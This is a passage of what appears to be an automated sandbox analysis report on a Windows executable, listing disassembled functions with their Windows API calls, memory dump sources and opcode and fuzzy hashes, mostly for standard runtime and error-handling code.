                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CB6884
                                              • IsDebuggerPresent.KERNEL32 ref: 00CB6950
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CB6970
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00CB697A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                              • String ID:
                                              • API String ID: 254469556-0
                                              • Opcode ID: 8a1922a4fb9f998c1c6507214d18dcf3b79e9fb8c50f0d7a524d112319d3ec8b
                                              • Instruction ID: 7461a74eec0c2a96f6dd5fa952499b60f96dbde9bd592448911fe1e1c326d56e
                                              • Opcode Fuzzy Hash: 8a1922a4fb9f998c1c6507214d18dcf3b79e9fb8c50f0d7a524d112319d3ec8b
                                              • Instruction Fuzzy Hash: 78312575D452189BDF21DFA5D989BCCBBB8BF08300F1041EAE40DAB290EB759B849F44
                                              Function 00C9932C Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00C9952D,?,00000040,00C9931E,00000001,?,?,?,?,0000001C,00CA7618,00CDE0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00C99330
                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,00C9952D,?,00000040,00C9931E,00000001,?,?), ref: 00C99351
                                              • _wcslen.LIBCMT ref: 00C99360
                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00CDE0C8,?,?,00C9952D,?,00000040,00C9931E,00000001,?,?,?,?,0000001C), ref: 00C99373
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                              • String ID:
                                              • API String ID: 991192900-0
                                              • Opcode ID: f8c11cccf84389e69258ff89bbd9752fbf1b71a1925a7b9f3cb687d0b7aa46fc
                                              • Instruction ID: 4f18c00837106ce328d1e97281ca36c35a6020db6c62d566a01734818379f070
                                              • Opcode Fuzzy Hash: f8c11cccf84389e69258ff89bbd9752fbf1b71a1925a7b9f3cb687d0b7aa46fc
                                              • Instruction Fuzzy Hash: 12F08275500204FBEF049FA5DD49FFF776CEB85B40B108059F502A61A0CA709F02A674
                                              Function 00CB4E14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • VirtualQuery.KERNEL32(80000000,00CB4D59,0000001C,00CB4F4E,00000000,?,?,?,?,?,?,?,00CB4D59,00000004,00CE5D84,00CB4FDE), ref: 00CB4E25
                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CB4D59,00000004,00CE5D84,00CB4FDE), ref: 00CB4E40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: InfoQuerySystemVirtual
                                              • String ID: D
                                              • API String ID: 401686933-2746444292
                                              • Opcode ID: 1fcac8a78af9dc35573e8aa731d05997814b8d20d26ca321d449e66cb6c653b5
                                              • Instruction ID: 31b6fab9585a890fe3ee38948d9ec19c7270614fd7ac8bad9b72b141718d57c4
                                              • Opcode Fuzzy Hash: 1fcac8a78af9dc35573e8aa731d05997814b8d20d26ca321d449e66cb6c653b5
                                              • Instruction Fuzzy Hash: B801F772A001096BCB18DE29CC45BEEBBAAAFD4328F0CC125ED29DB255D734D9018690
                                              Function 00CBAAC4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00CB535E), ref: 00CBABBC
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00CB535E), ref: 00CBABC6
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00CB535E), ref: 00CBABD3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 9ac68eda4879b23aa8be6b786de1420e88506d116f8280038552f197780531db
                                              • Instruction ID: 3717285b6d0039b79e364b6a2c63c3ab244736767fbfe19f354c18d12df57616
                                              • Opcode Fuzzy Hash: 9ac68eda4879b23aa8be6b786de1420e88506d116f8280038552f197780531db
                                              • Instruction Fuzzy Hash: DC31C675901218ABCF21DF69D989BDDB7B8BF08310F5041EAE81CA7261EB749F818F45
                                              Function 00CC1FF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .
                                              • API String ID: 0-248832578
                                              • Opcode ID: f3097b6b99a11c129773cb3afd14ef95e696ea36928e1722cbe2d378235b923c
                                              • Instruction ID: a69d0cb4d5b172a432dadd0b7f679f037af495f78c48dbf63be8f3f1f84b3e2d
                                              • Opcode Fuzzy Hash: f3097b6b99a11c129773cb3afd14ef95e696ea36928e1722cbe2d378235b923c
                                              • Instruction Fuzzy Hash: 8531E472900209AFDB249E78CC84FEBBBBDDB85314F04019DF92997252E6319E45CB50
                                              Function 00CC4360 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                              • Instruction ID: bcba913a55a855105cf2c9e5c46f7322d146af2abca099f71e7dbb172a31c239
                                              • Opcode Fuzzy Hash: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                              • Instruction Fuzzy Hash: EE021D71E001199BDF18CFA9C890BADB7F5EF49314F25826DE929E7384D731AA41CB90
                                              Function 00CAFD34 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CAFD6A
                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00CD9714,?,?), ref: 00CAFDB3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FormatInfoLocaleNumber
                                              • String ID:
                                              • API String ID: 2169056816-0
                                              • Opcode ID: d9233bea0f870b77e55c78417e15fab548384518388204f59039458211daca6f
                                              • Instruction ID: 5f5f6f4c86e4c9c29f96f6b18fb6624b645e319c2b2e7ebf685c3d13c981d849
                                              • Opcode Fuzzy Hash: d9233bea0f870b77e55c78417e15fab548384518388204f59039458211daca6f
                                              • Instruction Fuzzy Hash: 2F113C79221248AADB10DF60DC85BEF77F8EF08704F01542AE505A7291D670A909C765
                                              Function 00C948AA Relevance: 2.0, Strings: 1, Instructions: 776COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CMT
                                              • API String ID: 0-2756464174
                                              • Opcode ID: 74929df6553b490665cb08ddf7ada9dc22a58d4120dfc89a0e6f5efc624d7c53
                                              • Instruction ID: cb01d52861432ee57e2163a920a9635468d16816196f432dcb61f8fedda1ea40
                                              • Opcode Fuzzy Hash: 74929df6553b490665cb08ddf7ada9dc22a58d4120dfc89a0e6f5efc624d7c53
                                              • Instruction Fuzzy Hash: 8062C471A016499FDF09DF78C889BED7BA4BF15304F084179FC199B282DB30AA45DBA1
                                              Function 00CC86D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CC86CD,?,?,00000008,?,?,00CC836D,00000000), ref: 00CC88FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ExceptionRaise
                                              • String ID:
                                              • API String ID: 3997070919-0
                                              • Opcode ID: e6221e81ced9d118d74811a5a54a7d3486189d2f694d11bab6379fe6834a8a6b
                                              • Instruction ID: 5c8eccde37681bdd562148975c423edb453baaec0c1c26835eba3800478a8285
                                              • Opcode Fuzzy Hash: e6221e81ced9d118d74811a5a54a7d3486189d2f694d11bab6379fe6834a8a6b
                                              • Instruction Fuzzy Hash: 11B13B355106089FD715CF28C486F667BE0FF45364F29865CE8A9CF2A1CB35EA86CB41
                                              Function 00CB6694 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CB66AA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FeaturePresentProcessor
                                              • String ID:
                                              • API String ID: 2325560087-0
                                              • Opcode ID: 427f5c86a20a09b8756f64836cf9c46c9b32fccb92565cf6faab8f2b7bf94d5c
                                              • Instruction ID: 01d05de38bda784612fd80ef48cddd9b6857e8b51758b1f2f738aeb75af55152
                                              • Opcode Fuzzy Hash: 427f5c86a20a09b8756f64836cf9c46c9b32fccb92565cf6faab8f2b7bf94d5c
                                              • Instruction Fuzzy Hash: E85198B2A212058FEF15CF69D8C57AEBBF0FB58314F24846AC455EB2A1D7799E00CB50
                                              Function 00CA03BE Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00CA03ED
                                                • Part of subcall function 00CA0469: __EH_prolog3.LIBCMT ref: 00CA0470
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3Version
                                              • String ID:
                                              • API String ID: 2775145068-0
                                              • Opcode ID: 01c33ea6c6b19b6102a2328ca6e780c2f138583e34be9c78d015f285926c3976
                                              • Instruction ID: 6e9f136dbe63802b0e361f3b125de6ba39b455ac038ea6eb2eff13e5a9e11ed6
                                              • Opcode Fuzzy Hash: 01c33ea6c6b19b6102a2328ca6e780c2f138583e34be9c78d015f285926c3976
                                              • Instruction Fuzzy Hash: 19F0A43040524D8EEB24EF70EC057DD7BA07B1B74CF204469D6162B253D7B8958DEB11
                                              Function 00C95AFE Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: gj
                                              • API String ID: 0-4203073231
                                              • Opcode ID: 175c726fb586d555e857e3f7b85af814cc3203e612181033044821edc9c50e72
                                              • Instruction ID: fc6b4feee25fb6193479ba5d230c5666204aa220f110c215e40d602120c1c61b
                                              • Opcode Fuzzy Hash: 175c726fb586d555e857e3f7b85af814cc3203e612181033044821edc9c50e72
                                              • Instruction Fuzzy Hash: 7ED1F2B2A083458FC754CF29D88065AFBE2BFC9308F59492EE998D7301D734A955CF86
                                              Function 00CB6A0B Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00026A20,00CB6445), ref: 00CB6A10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 2cc57ee86ea9bbeda9c8f91ddfc3fae9e250c3bb89047e6f65a068939292607b
                                              • Instruction ID: 80cce510e0d2c5cd852f9be7114603631247b8927dcae35b29f225df8f0b8f8c
                                              • Opcode Fuzzy Hash: 2cc57ee86ea9bbeda9c8f91ddfc3fae9e250c3bb89047e6f65a068939292607b
                                              • Instruction Fuzzy Hash:
                                              Function 00CC2CE0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: HeapProcess
                                              • String ID:
                                              • API String ID: 54951025-0
                                              • Opcode ID: 328c37b2f5ff6fb88344f19756376498859910fd8c9bf9c0c44b51c68c6fb980
                                              • Instruction ID: 0e44746c0ffba432b010fa95441576e764d95f8e24e760f886d24a94a3653e71
                                              • Opcode Fuzzy Hash: 328c37b2f5ff6fb88344f19756376498859910fd8c9bf9c0c44b51c68c6fb980
                                              • Instruction Fuzzy Hash: 68A00271612241CFAB408F36EF8970E3AE9FE556D574D806DE40ACE175EB3584D1DB01
                                              Function 00CAABC8 Relevance: 1.0, Instructions: 977COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                              • Instruction ID: 5231a1eb4432185db7b9561a0f10355301cd022023d7a6a8d333d79978ac388e
                                              • Opcode Fuzzy Hash: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                              • Instruction Fuzzy Hash: 4082E9316047868FCB29CF28C5906BABBE1AF97308F14895DD8AB8B743D735AD45CB11
                                              Function 00C95F39 Relevance: .9, Instructions: 899COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e3fe84a7a2c79f4cf06f84ccd0765a7d158f0ab099874caad6c5a58dc7a89bc
                                              • Instruction ID: 6c64b1d23984be5f4bfe7f26f9007489e1df553ef54c889aa99d16e651352d17
                                              • Opcode Fuzzy Hash: 9e3fe84a7a2c79f4cf06f84ccd0765a7d158f0ab099874caad6c5a58dc7a89bc
                                              • Instruction Fuzzy Hash: FC823D65D39F895EE303963484022EBF3A86EF71C9F46D71FF8A431526E721A6C75201
                                              Function 00CAC27F Relevance: .9, Instructions: 880COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                              • Instruction ID: 6ee3fa29e7c50a819a7ccf1257cefb1bcd4a5789ad3a1a8a42b977a03bf3ce7c
                                              • Opcode Fuzzy Hash: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                              • Instruction Fuzzy Hash: 107226316043868FCB15CF68C8D06B9BBE1BF96308F18C56DE89A8B346D734E946DB11
                                              Function 00CA5214 Relevance: .7, Instructions: 694COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                              • Instruction ID: 4b589ae7c3e77a1d066940a37957f074d096e9439c3c383f8f8baa098a35243d
                                              • Opcode Fuzzy Hash: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                              • Instruction Fuzzy Hash: 6F524B726187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                              Function 00CABC05 Relevance: .5, Instructions: 537COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
